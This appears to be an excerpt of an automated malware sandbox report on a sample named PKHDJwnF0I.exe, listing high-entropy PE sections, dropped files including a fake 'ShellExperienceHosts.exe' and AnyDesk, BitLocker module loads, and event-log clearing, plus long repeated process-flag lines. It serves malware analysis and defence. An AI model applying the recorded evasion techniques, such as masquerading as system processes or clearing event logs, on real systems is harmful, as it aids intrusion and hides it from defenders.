Source: backup.exe.3.dr	Static PE information: section name: .tp6a
Source: backup.exe.3.dr	Static PE information: section name: .tp6
Source: backup.exe.3.dr	Static PE information: section name: .tp6
Source: backup.exe.3.dr	Static PE information: section name: .tp6d

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Code function: 0_2_0056D478 pushfd ; iretd	0_2_0056D4AC
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Code function: 0_2_00562AC9 push fs; retn 0000h	0_2_00562AC5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032E4345 push ecx; ret	3_2_032E4358
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032FA168 push eax; ret	3_2_032FA119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032FA0B8 push eax; ret	3_2_032FA119
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032F2470 push ebp; retf	3_2_032F2474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032F2450 push ebp; retf	3_2_032F2474
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAF4FB5 push ecx; ret	3_2_6CAF4FC8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10009DF5 push ecx; ret	3_2_10009E08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_1001FE9A push ecx; ret	3_2_1001FEBF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B9CAFF push eax; retf	3_2_02B9CB00
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B9CB0B push 701000CBh; retf	3_2_02B9CB10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B9CB07 pushad ; retf	3_2_02B9CB08
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B9CB61 pushfd ; retf	3_2_02B9CB64
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B99DCC push ecx; ret	3_2_02B99DDF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C43D04 push ecx; ret	3_2_02C43D17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_044CCE50 pushfd ; iretd	17_2_044CCE5D

Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6 entropy: 7.9916235972250025
Source: ShellExperienceHosts.exe.0.dr	Static PE information: section name: .tp6d entropy: 7.90195668192099
Source: backup.exe.3.dr	Static PE information: section name: .tp6 entropy: 7.9916235972250025
Source: backup.exe.3.dr	Static PE information: section name: .tp6d entropy: 7.90195668192099

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File created: C:\Users\user\AppData\Local\Temp\backup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	File created: C:\Users\Public\Bulete\program\yyzyBase.dll	Jump to dropped file
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	File created: C:\Users\user\AppData\Local\Temp\backup.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	File created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	File created: C:\Users\Public\Bulete\AnyDesk.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9BEF5C IsWindowVisible,IsIconic,	3_2_6C9BEF5C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9C4A38 SendMessageW,IsIconic,IsWindowVisible,	3_2_6C9C4A38
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9EC589 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	3_2_6C9EC589
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9BBE2F IsIconic,	3_2_6C9BBE2F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9DB04F GetParent,IsIconic,GetParent,	3_2_6C9DB04F

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DB3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,

3_2_032DB3C0

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4

Jump to behavior

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
